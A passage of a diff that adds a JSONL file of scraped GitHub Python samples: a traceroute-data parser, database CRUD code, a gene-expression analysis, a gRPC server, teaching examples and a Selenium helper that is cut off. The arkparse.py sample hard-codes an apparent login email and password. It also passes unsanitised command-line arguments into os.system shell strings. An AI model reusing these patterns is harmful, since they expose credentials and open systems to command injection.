diff --git "a/3679.jsonl" "b/3679.jsonl" new file mode 100644--- /dev/null +++ "b/3679.jsonl" @@ -0,0 +1,459 @@ +{"seq_id":"37487835896","text":"# import files\nimport sys\nimport os\nimport os.path\nimport urllib\nimport gzip\nfrom requests.auth import HTTPBasicAuth\nimport requests\nimport time\n\n\n# initialize node list\nnodelist = []\n\n\ndef parse(year, month, day):\n\n\tedgecount = 0\n\n\t# open nodelist file\n\tf = open(\"/home/jay/Trace/ark_nodes.txt\", \"r\")\n\n\t# read nodes into list\n\tfor item in f:\n\t\tnodelist.append(item)\n\tf.close()\n\n\t# re-initialize variables each time (clear)\n\ttrace = []\n\n\tall_trace = []\n\tunique_trace = set()\n\n\tall_ip = []\n\tunique_ip = set()\n\n\tedgeList = set()\n\n\tsrc = ''\n\tdst = ''\n\thop = ''\n\tip = ''\n\taddr = ''\n\n\tstarCounter = 1\n\tcount = 1\n\n\t# check for directories and create if necessary\n\tif not os.path.exists(\"/home/jay/Desktop/Trace_01/ArkData\"):\n\t\tos.makedirs(\"/home/jay/Desktop/Trace_01/ArkData\")\n\n\tif not os.path.exists(\"/home/jay/Desktop/Trace_01/ark-temp\"):\n\t\tos.makedirs(\"/home/jay/Desktop/Trace_01/ark-temp\")\n\n\t# open files for write\n\tout1 = open(\"/home/jay/Desktop/Trace_01/ArkData/all_trace_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout2 = open(\"/home/jay/Desktop/Trace_01/ArkData/unique_trace_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout3 = open(\"/home/jay/Desktop/Trace_01/ArkData/all_ip_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout4 = open(\"/home/jay/Desktop/Trace_01/ArkData/unique_ip_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout5 = open(\"/home/jay/Desktop/Trace_01/ArkData/unique_edge_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\tout6 = open(\"/home/jay/Desktop/Trace_01/ArkData/stats_\" + month + '_' + day + '_' + year + \".txt\", \"w\")\n\n\t# iterate through each team\n\tfor x in range(1, 4):\n\n\t\t# cycle through each file for team/day\n\t\tfor item in nodelist:\n\n\t\t\t# remove carriage return\n\t\t\titem = item.strip('\\n')\n\n\t\t\t# retrieve file\t\t\t\n\t\t\tfilename = \"https://topo-data.caida.org/team-probing/list-7.allpref24/team-\" + str(x) + \"/daily/\" + year + \"/cycle-\" + year + month + day + \"/daily.l7.t1.c004642.\" + year + month + day + \".\" + item + \".warts.gz\"\n\n\t\t\t# fetch file with requests\n\t\t\tr = requests.get(filename, auth=(\"jthom@cse.unr.edu\", \"sherdnig3544\"))\n\n\t\t\t# open file for write\n\t\t\tf = open(\"/home/jay/Desktop/Trace_01/ark-temp/temp.gz\", \"wb\")\n\t\t\tfor chunk in r.iter_content(chunk_size=512 * 1024):\n\t\t\t\tif chunk:\n\t\t\t\t\tf.write(chunk)\n\t\t\tf.close()\n\n\t\t\t# use scamper to convert to text file\n\t\t\tos.system(\"zcat /home/jay/Desktop/Trace_01/ark-temp/temp.gz | sc_warts2text > /home/jay/Desktop/Trace_01/ark-temp/warts.txt\")\n\n\t\t\t# open textfile for read\n\t\t\tf = open(\"/home/jay/Desktop/Trace_01/ark-temp/warts.txt\", \"r\")\n\n\t\t\ttry:\n\t\t\t\t# iterate through each line\n\t\t\t\tfor line in f:\n\n\t\t\t\t\t# split line into pieces\n\t\t\t\t\tline = line.split()\n\n\t\t\t\t\t# build trace string (line not traceroute)\n\t\t\t\t\tif line[0] != 'traceroute':\n\t\t\t\t\t\thop = line[0]\n\t\t\t\t\t\tip = line[1]\n\n\t\t\t\t\t\tif ip == '*':\n\t\t\t\t\t\t\tip = '0'\n\n\t\t\t\t\t\t#addr = ip + '-' + hop + ' ' # changed this to make it easier for Abdullah to parse in C\n\t\t\t\t\t\taddr = ip + ',' + hop + '\\t'\t\t\t\t\t\t\n\t\t\t\t\t\ttrace.append(addr)\n\t\t\t\t\t\tall_ip.append(ip)\n\t\t\t\t\t\tunique_ip.add(ip)\n\n\t\t\t\t\t# reset and append running list each time line == traceroute\n\t\t\t\t\tif line[0] == 'traceroute':\n\n\t\t\t\t\t\t# get values for src, dst\n\t\t\t\t\t\tsrc = line[2]\n\t\t\t\t\t\tdst = line[4]\n\n\t\t\t\t\t\tif src == '*':\n\t\t\t\t\t\t\tsrc = '0'\n\n\t\t\t\t\t\tif dst == '*':\n\t\t\t\t\t\t\tdst = '0'\n\n\t\t\t\t\t\tall_ip.append(src)\n\t\t\t\t\t\tall_ip.append(dst)\n\t\t\t\t\t\tunique_ip.add(src)\n\t\t\t\t\t\tunique_ip.add(dst)\n\n\t\t\t\t\t\t# check for empty list and append if good\n\t\t\t\t\t\tif not trace:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t# eliminate trailing '*'s\n\t\t\t\t\t\t\twhile '0' in trace[-1]:\n\t\t\t\t\t\t\t\tdel(trace[-1])\n\n\t\t\t\t\t\t\t# convert list to string\n\t\t\t\t\t\t\ttrace = ''.join(trace)\n\n\t\t\t\t\t\t\t# append string to running lists\n\t\t\t\t\t\t\tall_trace.append(trace)\n\t\t\t\t\t\t\tunique_trace.add(trace)\n\n\t\t\t\t\t\t# reset trace\n\t\t\t\t\t\ttrace = []\n\n\t\t\t\t\t\t# append src, dst to new trace\n\t\t\t\t\t\t#trace.append(src + ':' + dst + ' ') # changed this to make it easier for Abdullah to parse in C\n\t\t\t\t\t\ttrace.append(src + ':' + dst + '\\t')\t\t\t\t\t\t\n\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\t# once more at end to catch last trace\n\t\t\ttry:\n\t\t\t\t# eliminate trailing '*'s\n\t\t\t\twhile '0' in trace[-1]:\n\t\t\t\t\tdel(trace[-1])\n\n\t\t\t\t# convert list to string\n\t\t\t\ttrace = ''.join(trace)\n\n\t\t\t\t# append string to running lists\n\t\t\t\tall_trace.append(trace)\n\t\t\t\tunique_trace.add(trace)\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\tf.close()\n\n\t\t\t#except:\n\t\t\t\t#print (\"url does not exist\")\n\n\n\n\t# find edges...\n\t# iterate through unique traces\n\tfor item in unique_trace:\n\n\t\t# set list so it will reset\n\t\ttrace = []\n\n\t\t# split trace and push to list\n\t\t#for item in item.split(): # changed this to make it easier for Abdullah to parse in C\n\t\tfor item in item.split('\\t'):\t\t\n\t\t\tif (':' in item):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t#item = item.split('-') # changed this to make it easier for Abdullah to parse in C\n\t\t\t\titem = item.split(',')\t\t\t\t\n\t\t\t\ttrace.append(item[0])\n\n\t\t# find length of list\n\t\tlength = len(trace)\n\n\t\t# set iterator variable so it will reset\n\t\ti = 0\n\n\t\t# iterate through trace list for pairs\n\t\twhile i < length - 1:\n\t\t\tfirst = trace[i]\n\t\t\tsecond = trace[i+1]\n\n\t\t\t# set incrementing value for 0's\n\t\t\tif first == '0' and second == '0':\n\t\t\t\t# don't count 0 - 0\n\t\t\t\tpass\n\n\t\t\telse:\n\n\t\t\t\tif first == '0':\n\t\t\t\t\tfirst = count\n\t\t\t\t\tcount += 1\n\n\t\t\t\tif second == '0':\n\t\t\t\t\tsecond = count\n\t\t\t\t\tcount += 1\n\n\t\t\t# add to edgeList set (unique values only)\n\t\t\t#edgeList.add(str(first) + ' ' + str(second)) # changed this to make it easier for Abdullah to parse in C\n\t\t\tedgeList.add(str(first) + '\\t' + str(second))\t\t\t\n\t\t\ti += 1\n\n\n\t# write all_trace to file\n\tfor item in all_trace:\n\t\tout1.write(item)\n\t\tout1.write('\\n')\n\n\t# write unique_trace to file\n\tfor item in unique_trace:\n\t\tout2.write(item)\n\t\tout2.write('\\n')\n\n\t# write all_ip to file\n\tfor item in all_ip:\n\t\tout3.write(item)\n\t\tout3.write('\\n')\n\n\t# write unique_ip to file\n\tfor item in unique_ip:\n\t\tout4.write(item)\n\t\tout4.write('\\n')\n\n\t# write edgelist to file\n\tfor item in edgeList:\n\t\tout5.write(item)\n\t\tout5.write('\\n')\n\n\t\titem = item.split('\\t')\t\t\t\n\n\t\tif (('.' in item[0]) and ('.' in item[1])):\n\t\t\tedgecount += 1\n\n\t# write stats\n\tout6.write(\"Total IP: \" + str(len(all_ip)) + '\\n')\n\tout6.write(\"Unique IP: \" + str(len(unique_ip)) + '\\n')\n\tout6.write(\"Total Trace: \" + str(len(all_trace)) + '\\n')\n\tout6.write(\"Unique Trace: \" + str(len(unique_trace)) + '\\n')\n\tout6.write(\"Unique Edge: \" + str(edgecount) + '\\n')\n\n\t# close files\n\tout1.close()\n\tout2.close()\n\tout3.close()\n\tout4.close()\n\tout5.close()\n\tout6.close()\n\n\ndef main(argv):\n\n\t# get day from command line args\n\tyear = sys.argv[1]\n\tmonth = sys.argv[2]\n\tday = sys.argv[3]\n\t\n\tstart = time.time()\n\n\t# run parse\n\tparse(year, month, day)\n\n\t# trace count\n\tos.system(\"./ark_tracecount \" + year + ' ' + month + ' ' + day)\n\n\t# ip count\n\tos.system(\"./ark_ipcount \" + year + ' ' + month + ' ' + day)\n\n\tend = time.time()\n\n\twith open(\"log.txt\", \"a\") as f:\n\t\tf.write(\"Ark:\" + '\\t' + \"Start-Time-\" + month + '_' + day + '_' + year + '\\t' + \"Runtime (minutes)-\" + str((end - start)/60) + '\\n')\n\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"spitfire4040/Trace","sub_path":"arkparse.py","file_name":"arkparse.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38292175527","text":"from sqlalchemy.orm import Session\nfrom typing import Union\n\nfrom .. import models, schemas\n\n\ndef create_asset(db: Session, asset: schemas.AssetCreate, portfolio_id: int) -> Union[models.Asset, None]:\n # get portfolio that has the same title and currency\n db_asset = db.query(models.Asset).filter(\n models.Asset.portfolio_id == portfolio_id, \n models.Asset.currency_id == asset.currency_id).first()\n\n # if the asset already exists then raise an error\n if db_asset is not None:\n return None\n\n db_asset = models.Asset(**asset.dict(), portfolio_id=portfolio_id)\n db.add(db_asset) \n db.commit()\n db.refresh(db_asset)\n return db_asset\n\n\ndef update_asset(db: Session, asset: schemas.AssetUpdate, portfolio_id: int) -> Union[models.Asset, None]:\n db_asset = db.query(models.Asset).filter(models.Asset.portfolio_id == portfolio_id, models.Asset.id == asset.id).first()\n if db_asset is None:\n return None\n\n db_asset.amount = asset.amount\n db.commit()\n db.refresh(db_asset)\n return db_asset\n\n\ndef delete_asset(db: Session, portfolio_id: int, asset_id: int) -> int:\n status = db.query(models.Asset).filter(models.Asset.portfolio_id == portfolio_id, models.Asset.id == asset_id).delete()\n db.commit()\n return status","repo_name":"fidesy/crypto-tracker","sub_path":"crypto_tracker/crud/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13696461879","text":"import numpy as np\nimport pandas as pd\nimport scipy, sys, sklearn.decomposition\nimport statsmodels.api as sm\nimport functions\n\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nfrom plotly.graph_objs import *\n\n#Read in data, data will contain the gene expression file, annotations contains the metadata, genes contains gene metadata. It is annoying that it is spread over many files.. \n\ndata = pd.read_csv('/Users/pwangel/Downloads/myeloid_atlas_expression_v7.1.tsv', sep='\\t', index_col=0)\nannotations = pd.read_csv('/Users/pwangel/Downloads/myeloid_atlas_samples_v7.1.tsv', sep='\\t', index_col=0)\nannotations_platform = pd.read_csv('/Users/pwangel/PlotlyWorkspace/combine_data/blood/outputs_for_front_end/iMac_annotations.tsv', sep='\\t', index_col=0) ### Need to get the platform separately from this file\nannotations = annotations.merge(annotations_platform['Platform_Category'], how='inner', left_index=True, right_index=True)\n\ngenes_s4m = pd.read_csv('/Users/pwangel/Downloads/myeloid_atlas_genes_v7.1.tsv', sep='\\t', index_col=0)\ngenes_varPart = pd.read_csv('/Users/pwangel/Downloads/myeloid_atlas_genes.tsv', sep='\\t', index_col=0)\ngenes = genes_s4m.merge(genes_varPart['Platform_VarFraction'], how='left', left_index=True, right_index=True) # Want genes to have a platform variance fraction plus ensembl-gene symbol conversion\n\ncut_data = functions.transform_to_percentile(data.loc[genes.loc[genes.inclusion.values].index.values.astype(str), annotations.index.values])\nall_ranked_data = functions.transform_to_percentile(data.loc[:, annotations.index.values])\nannotations['Cluster'] = 1 #Dummy values for the categories of samples we will compare\n\n#Generate the atlas PCA and use it to remove samples that are not part of the DE\npca = sklearn.decomposition.PCA(n_components=3, svd_solver='full')\npca_coords = pca.fit_transform(cut_data.transpose())\nannotations = annotations.loc[pca_coords[:,0] < 0]\nall_ranked_data = all_ranked_data[annotations.index]\ncut_data = cut_data[annotations.index]\n\n#Folder to output p values and graphs into.\nfname = 'macrophage_tissues'\nfolder = 'macrophage_tissues'\n\ncluster_names = []\nsample_ids = []\n\n# Create a list of sample types and the ids for each category of interest. It is unnecessary to do it this way now, but there was a reason I did it like this previous (it's not worth refactoring either).\nfor i_cluster, i_categories in zip([1,2,3], [[['macrophage', 'colon'], ['macrophage', 'ascites - ovarian cancer']], \\\n [['macrophage', 'lung'], ['macrophage', 'synovium']], \\\n [['macrophage', 'blood'], ['kupffer cell', 'liver'], ['microglia', 'brain']]]):\n\n sample_types = []\n\n for i_sample_type in i_categories:\n sample_types.append(i_sample_type[0]+'_'+i_sample_type[1])\n sel_samples = (annotations['Cell Type'].values==i_sample_type[0]) & (annotations.Tissue.values==i_sample_type[1])\n sample_ids.append(annotations.loc[sel_samples].index.values)\n annotations.loc[sel_samples, 'Cluster'] = i_cluster\n \n print(i_sample_type, \"N samples = %d\" %annotations.loc[sel_samples].shape[0])\n print(\"Sample platforms = \", np.unique(annotations.loc[sel_samples].Platform_Category.values))\n print(\"N per respective platform = \", np.unique(annotations.loc[sel_samples].Platform_Category.values, return_counts=True)[1])\n\n cluster_names.append('/'.join(sample_types))\n\n#Narrow down data to only samples of interest\nannotations = annotations.loc[np.concatenate(sample_ids)]\ncut_data = cut_data[np.concatenate(sample_ids)]\ncut_unfiltered_data = all_ranked_data[np.concatenate(sample_ids)]\n\ngene_list = genes.symbol.values[~pd.isnull(genes.symbol.values) & genes.inclusion]\n\npvals = np.array([])\ndelta_median = np.array([])\n\n# Create dataframe to output results into\n# Also keeping track of the mean/std of each category\ndf_output = pd.DataFrame(index=gene_list, columns=np.append(np.append(cluster_names, [i+' Mean' for i in cluster_names]), [i+' Std' for i in cluster_names]))\n\n#Loop through the sample types and genes to find differentially expressed genes\nfor i_gene in gene_list:\n\n for i_cluster, cluster_name in zip([1,2,3], cluster_names):\n\n ensembl_id = genes.index.values[genes.symbol.values==i_gene]\n\n # If the gene is in the filtered data\n\n if ensembl_id in cut_data.index.values:\n \n ranks_of_sample = cut_data.loc[ensembl_id, annotations.Cluster.values==i_cluster].values\n ranks_not_sample = cut_data.loc[ensembl_id, (annotations.Cluster.values!=i_cluster)].values\n \n pvals = np.append(pvals, scipy.stats.mannwhitneyu(ranks_of_sample.flatten(), ranks_not_sample.flatten(), alternative='two-sided')[1])\n delta_median = np.append(delta_median, np.abs(np.median(ranks_of_sample)-np.median(ranks_not_sample)))\n\n # If the gene is not in the filtered data. We want to plot all the genes\n\n else:\n\n ranks_of_sample = cut_unfiltered_data.loc[ensembl_id, annotations.Cluster.values==i_cluster].values\n ranks_not_sample = cut_unfiltered_data.loc[ensembl_id, (annotations.Cluster.values!=i_cluster)].values\n \n pvals = np.append(pvals, scipy.stats.mannwhitneyu(ranks_of_sample.flatten(), ranks_not_sample.flatten(), alternative='two-sided')[1])\n delta_median = np.append(delta_median, np.abs(np.median(ranks_of_sample)-np.median(ranks_not_sample)))\n\n df_output.loc[i_gene, cluster_name+' Mean'] = ranks_of_sample.mean()\n df_output.loc[i_gene, cluster_name+' Std'] = ranks_of_sample.std()\n\n\n#Correct for multiple testing\n#corrected_pvals = sm.stats.fdrcorrection(pvals)\ncorrected_pvals = sm.stats.multipletests(pvals, alpha=0.05, method='bonferroni', is_sorted=False, returnsorted=False)\n\n#Loop through again and place into dataframe\ni_pval = 0\n\nfor i_gene in gene_list:\n\n for i_cluster, cluster_name in zip([1,2,3], cluster_names):\n\n ensembl_id = genes.index.values[genes.symbol.values==i_gene]\n\n df_output.loc[i_gene, cluster_name] = corrected_pvals[1][i_pval]\n\n i_pval += 1 \n\ndf_output.loc[~df_output.iloc[:,0].isnull()].to_csv('/Users/pwangel/PlotlyWorkspace/iMac_plots/%s/%s_pvals.tsv' %(folder, fname), sep='\\t')\n\n#Plot a dot plot for each gene\n\nimport seaborn as sns\nimport matplotlib.pyplot as pyplot\nsns.set(style=\"ticks\")\n\nfor i_gene in gene_list:\n\n ensembl_id = genes.index.values[genes.symbol.values==i_gene]\n df_violin = pd.DataFrame(columns=['Expression', 'Cell Property', 'Cell Colour'])\n platform_std = (np.sqrt(genes.Platform_VarFraction.values)*all_ranked_data.std(axis=1).values)[genes.symbol.values==i_gene][0]\n platform_mean = all_ranked_data.loc[ensembl_id].mean(axis=1)[0]\n\n for i_cluster, cluster_name in zip([1,2,3], cluster_names):\n\n i_sample_ids = (annotations.Cluster.values==i_cluster)\n if genes.loc[genes.symbol.values==i_gene].inclusion.values: \n i_type_vals = cut_data.loc[ensembl_id, i_sample_ids].values.flatten().astype(float)\n else:\n i_type_vals = all_ranked_data.loc[ensembl_id, i_sample_ids].values.flatten().astype(float)\n\n tier1_vals = np.full(shape=i_type_vals.shape[0], fill_value=cluster_name)\n df_violin = df_violin.append(pd.DataFrame(columns=['Expression', 'Cell Property'], data = np.array([i_type_vals, tier1_vals]).transpose()), ignore_index=True)\n\n df_violin.Expression = df_violin.Expression.astype(float)\n\n\n fig, ax = pyplot.subplots(1,1, figsize=(13.5,7.0))\n ax = sns.swarmplot(x=\"Cell Property\", y=\"Expression\", size=9, order = cluster_names, color='blue', data=df_violin)\n\n ax.fill_between(x=[ax.get_xlim()[0], ax.get_xlim()[1]], y1=platform_mean-platform_std, y2=platform_mean+platform_std, color='lightgrey', alpha=0.5)\n\n pyplot.ylabel(i_gene+' Expression')\n pyplot.ylim(0.0, 1.0)\n #pyplot.show()\n pyplot.savefig('/Users/pwangel/PlotlyWorkspace/iMac_plots/%s/%s/%s.eps' %(folder, fname,i_gene))\n ax.remove()\n pyplot.close()\n\n\n\n","repo_name":"wellslab/pauls_atlas_building","sub_path":"notebooks_and_scripts/ranksum_DE_examples/macrophage_tissue_DE.py","file_name":"macrophage_tissue_DE.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75367254248","text":"import numpy as np\nfrom scipy.special import comb\n\ndef ari(X,Y):\n\tkX = len(X)\n\tkY = len(Y)\n\ta = np.array(list(map(len, X)))\n\tb = np.array(list(map(len, Y)))\n\tn = a.sum()\n\tassert b.sum() == n\n\tXs = np.zeros((kX, n))\n\tYs = np.zeros((n, kY))\n\tfor i, clX in enumerate(X):\n\t\telems = np.arange(n)\n\t\tXs[i, :] = np.isin(elems, clX)\n\tfor j, clY in enumerate(Y):\n\t\telems = np.arange(n)\n\t\tYs[:, j] = np.isin(elems, clY)\n\tN = np.matmul(Xs, Ys)\n\tnum1 = comb(N, 2).sum()\n\tnum2 = comb(a, 2).sum() * comb(b, 2).sum() / comb(n, 2)\n\tden1 = 0.5 * ( comb(a, 2).sum() + comb(b, 2).sum() ) \n\tden2 = ( comb(a,2).sum() * comb(b,2).sum() ) / comb(n, 2)\n\treturn (num1 - num2) / (den1 - den2)\n\ndef misclustered_vertices(X, Y):\n\tkX = len(X)\n\tkY = len(Y)\n\tassert kX == kY\n\tk = kX\n\tk_ = np.arange(k)\n\tfrom itertools import permutations\n\tfrom itertools import chain\n\tmin_misclass = float('inf')\n\tfrom tqdm import tqdm as tqdm\n\tprint('checking permutations for misclustered vertices')\n\tfor perm in tqdm(permutations(k_)):\n\t\tmiscl_verts = sum(sum([[[x for x in X[c] if not(x in Y[perm[c]])], [y for y in Y[perm[c]] if not(y in X[c])]] for c in k_], []), [])\n\t\tmiscl_verts = len(np.unique(miscl_verts))\n\t\tmin_misclass = min(min_misclass, miscl_verts)\n\treturn min_misclass\n","repo_name":"dks28/PartII_Project","sub_path":"src/testing/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30379589017","text":"from concurrent import futures\nimport logging\n\nimport grpc\nimport QuadraticEquation_pb2\nimport QuadraticEquation_pb2_grpc\n\nfrom QuadraticEquation import quadraticEquation\n\n\nclass QuadraticEquationServicer(QuadraticEquation_pb2_grpc.QuadraticEquationServicer):\n\n def quadraticEquation(self, request, context):\n # Takes in 3 requested values as parameters\n a = request.a\n b = request.b\n c = request.c\n\n # Returns response as solution identified in .proto file\n response = QuadraticEquation_pb2.Solution()\n\n # Checks functions result then sends back response to client\n result = quadraticEquation(a, b, c)\n if result == None:\n response.x1 = \"The answer does not exist.\"\n response.x2 = \"The answer does not exist.\"\n else:\n response.x1 = result[0]\n response.x2 = result[1]\n return response\n\ndef serve():\n port = \"50051\"\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n QuadraticEquation_pb2_grpc.add_QuadraticEquationServicer_to_server(\n QuadraticEquationServicer(), server)\n server.add_insecure_port(\"[::]:\" + port)\n server.start()\n print(\"Server started, listening on \" + port)\n server.wait_for_termination()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n serve()\n","repo_name":"Ryan-Richardson11/AdvancedProgrammingConcepts","sub_path":"Week2/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23228737802","text":"# ------------------------------------------------------------\n# Clase que representa personas:\nclass Persona:\n def __init__(self, cedula, nombre, apellido):\n self.cedula = cedula\n self.nombre = nombre\n self.apellido = apellido\n\n def __str__(self):\n return f'({self.cedula}) {self.apellido}, {self.nombre} '\n\n# ------------------------------------------------------------\n# Clase quel representa destrezas de la Persona\nclass Destreza:\n def __init__(self, area, herramienta, experiencia):\n self.area = area\n self.herramienta = herramienta\n self.experiencia = experiencia\n\n def __str__(self):\n return f'{self.area} {self.herramienta} {self.experiencia}'\n\n# ------------------------------------------------------------\n# Clase que hereda de Persona y Destreza\nclass Jefe(Persona, Destreza):\n def __init__(self, cedula, nombre, apellido, area, herramienta, experiencia, grupo):\n # Invoca al constructor de clase Persona\n Persona.__init__(self, cedula, nombre, apellido)\n # Invoca al constructor de clase Destreza\n Destreza.__init__(self, area, herramienta, experiencia)\n # Nuevos atributos\n self.grupo = grupo\n\n def __str__(self):\n cadena = f\"{self.cedula}: {self.nombre} {self.apellido},\\nArea: '{self.area}', \\nHerramienta: {self.herramienta}, \\nGrupo: {self.grupo}\"\n return cadena\n\n\n# ------------------------------------------------------------\n# Bloque principal\n# ------------------------------------------------------------\nprint(\"\\033[H\\033[J\") # Limpiamos la pantalla \n \nprint(\"-\"*30)\npersona1 = Persona(123456789, 'Juan', 'Perez')\nprint(\"Persona1:\")\nprint(persona1)\nprint(\"-\"*30)\n\ndestreza1 = Destreza('Programacion', 'Python', 'Experto')\nprint(\"Destreza1:\")\nprint(destreza1)\nprint(\"-\"*30)\n\njefe1 = Jefe(123456789, 'Ana', 'Jaurez', 'Diseño', 'Interfaz', 'Junior', '1')\nprint(\"Jefe1:\")\nprint(jefe1)\nprint(\"-\"*30)\n\n","repo_name":"King-Zalogon/CODO-Python-Fullstack-2023","sub_path":"Python/Clase31-Python7/04-Herencia_Multiple.py","file_name":"04-Herencia_Multiple.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2477846404","text":"from inspect import getfullargspec\n\n\ndef run(self, output):\n \"\"\"Execute the plot contained in the PostPlot object and save it to save_path\n\n Parameters\n ----------\n self : PostPlot\n A PostPlot object\n output : Output\n an Output object\n\n \"\"\"\n\n list_names = self.method.split(\".\")\n\n if len(list_names) == 1:\n # Getting the name of the plot method of the output or the object given by attribute\n plot_method = getattr(output, self.method)\n else:\n # Find object which contains the plot method if attribute is not None\n obj = output\n\n # Get successive objects to reach the one containing the method\n for i in range(len(list_names) - 1):\n obj = getattr(obj, list_names[i])\n\n # Getting the name of the plot method of the output or the object given by attribute\n plot_method = getattr(obj, list_names[-1])\n\n # Path to save the figure if save_path is not already in param_dict and is an argument of the plot method\n if (\n \"save_path\" not in self.param_dict\n and \"save_path\" in getfullargspec(plot_method)[5]\n ):\n # Get path of results folder in the Output\n result_path = output.get_path_result()\n\n # Check in case format begins with a \".\"\n if self.save_format[0] == \".\":\n str_format = self.save_format\n else:\n str_format = \".\" + self.save_format\n\n # Build save_path of the picture\n self.param_dict[\"save_path\"] = result_path + \"/\" + self.name + str_format\n\n # Execute plot method\n plot_method(\n *self.param_list,\n **self.param_dict,\n )\n","repo_name":"gverez/pyleecan","sub_path":"pyleecan/Methods/Post/PostPlot/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"15836986231","text":"#filename:client_real.py\n#function: client using\n#step1: create socket\n#step2: connect to server\n\nimport socket # for socket\nimport sys\nPORT=80 #default port for socket\n\n#step1: create socket\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print( \"Socket successfully created\")\nexcept socket.error as err:\n print (\"socket creation failed with error %s\" %(err))\n\ntry:\n host_ip = socket.gethostbyname('www.google.com')\nexcept socket.gaierror:\n print (\"there was an error resolving the host\")\n sys.exit()\n\n#step2: connect to the server\ns.connect((host_ip,PORT))\n\nprint (\"socket connected to google IP == %s\" %(host_ip))\n# receive data from the server\ntry:\n# recv_msg=s.recv(1024)\n recv_msg=s.write(\"test\")\nexcept:\n print(\"\\n receiving error\")\nelse:\n print(recv_msg)\ns.close() \n","repo_name":"Scott-S-Lin/Python_Programming_ChineseBook","sub_path":"ch12/client_real.py","file_name":"client_real.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11328137452","text":"class Node:\n def __init__(self, value):\n self.info = value\n self.next = None\n\nclass SLLaddOne:\n def __init__(self):\n self.head = None\n \n \n def traversal(self):\n if self.head == None:\n print(\"\\nList is Empty !\")\n return \n \n print(\"\\nList is: \", end = \" \")\n p = self.head\n while p != None:\n print(p.info, end = \" \")\n p = p.next\n print(\"\\n\")\n \n\n def append(self, data):\n new = Node(data)\n if self.head == None:\n self.head = new\n return\n \n p = self.head\n while p.next != None:\n p = p.next\n p.next = new\n \n\n def create_list(self):\n num = int(input(\"\\nEnter the Number of Nodes: \"))\n if num == 0:\n return\n \n print(\"\\nEnter the values for the Nodes: \")\n for i in range(num):\n i = int(input())\n self.append(i)\n\n \n def reverse_list(self):\n p = self.head\n r = None\n while p != None:\n q = p.next\n p.next = r\n r = p\n p = q\n self.head = r\n \n \n def adding_one(self):\n if self.head == None:\n print(\"\\nList is Empty !\")\n return\n add = SLLaddOne()\n self.reverse_list()\n \n carry = 0\n sum = self.head.info+1\n if sum >= 10:\n carry = 1\n rem = sum % 10\n add.append(rem)\n else:\n carry = 0\n add.append(sum)\n\n p = self.head.next\n while p != None:\n sum = p.info+carry\n if sum >= 10:\n carry = 1\n rem = sum % 10\n if p.next == None and p.info == 9:\n c = 0\n new = Node(c)\n p.next = new\n add.append(rem)\n else:\n add.append(rem)\n else:\n carry = 0\n add.append(sum)\n p = p.next\n add.reverse_list()\n return add\n \n\n\nif __name__ == \"__main__\":\n objct = SLLaddOne()\n objct.create_list()\n\n print(\"\\n-------------------- Single Linked List --------------------\\n\")\n\n while(True):\n print(\"\\n\\n1. Display the List.\")\n print(\"2. Append Nodes.\")\n print(\"3. Addition of One at Last Node.\")\n print(\"4. Quit.\")\n\n option = int(input(\"\\nEnter the preferred option: \"))\n\n if option == 1:\n objct.traversal()\n elif option == 2:\n data = int(input(\"\\nEnter the new value: \"))\n objct.append(data)\n print(\"\\nInsertion done check the Updated List.\")\n elif option == 3:\n sum1 = objct.adding_one()\n sum1.traversal()\n #print(\"\\nAddition done check the updated List.\")\n elif option == 4:\n print(\"\\nThank You for your time !\")\n break\n else:\n print(\"\\nWrong input please try again !\")\n \n print(\"\\n\")\n","repo_name":"maxkashyap41/pythonDSA","sub_path":"Linked List/SingleLinkedList_adding_one.py","file_name":"SingleLinkedList_adding_one.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32157294347","text":"from Base import launchPage\nfrom Base import page_actions\nfrom Libraries import configRead\nfrom Assersions import alerts_n_modals_Assersions\nimport time\n\nclass Alert_and_modals_Class():\n\n def __init__(self, objdriver, objwait):\n global driver\n global wait\n driver = objdriver\n wait= objwait\n\n def click_Alerts_Menu(self):\n launchPage.click_menu(driver,\"Alerts\",\"alerts_modal_Menu_xpath\")\n\n def click_window_popup_modal_SubMenu(self):\n launchPage.click_submenu(driver,\"Alerts\",\"window_popup_modal_SubMenu_xpath\")\n\n def click_facebook_like_button(self):\n page_actions.click_button_with_Wait(driver,wait,\"Alerts_window_popup_modal\",\"Facebook_Like_button_xpath\")\n\n def switch_to_facebook_window(self):\n windows = 